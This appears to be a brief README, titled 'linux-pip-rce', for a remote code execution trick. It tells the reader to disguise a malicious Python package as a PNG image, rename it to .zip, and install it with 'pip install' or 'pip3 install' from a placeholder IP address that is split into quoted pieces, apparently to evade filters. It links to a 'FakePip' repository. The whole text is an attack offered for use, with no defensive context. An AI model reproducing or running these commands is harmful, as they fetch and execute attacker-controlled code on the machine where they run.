# linux-pip-rce
Save the image and change the extension to .zip ! </br>
pip install "http://1"."2"."3"."4/Rce.png" </br>
pip3 install "http://1"."2"."3"."4/Rce.png"</br></br></br>


https://github.com/0x00-0x00/FakePip
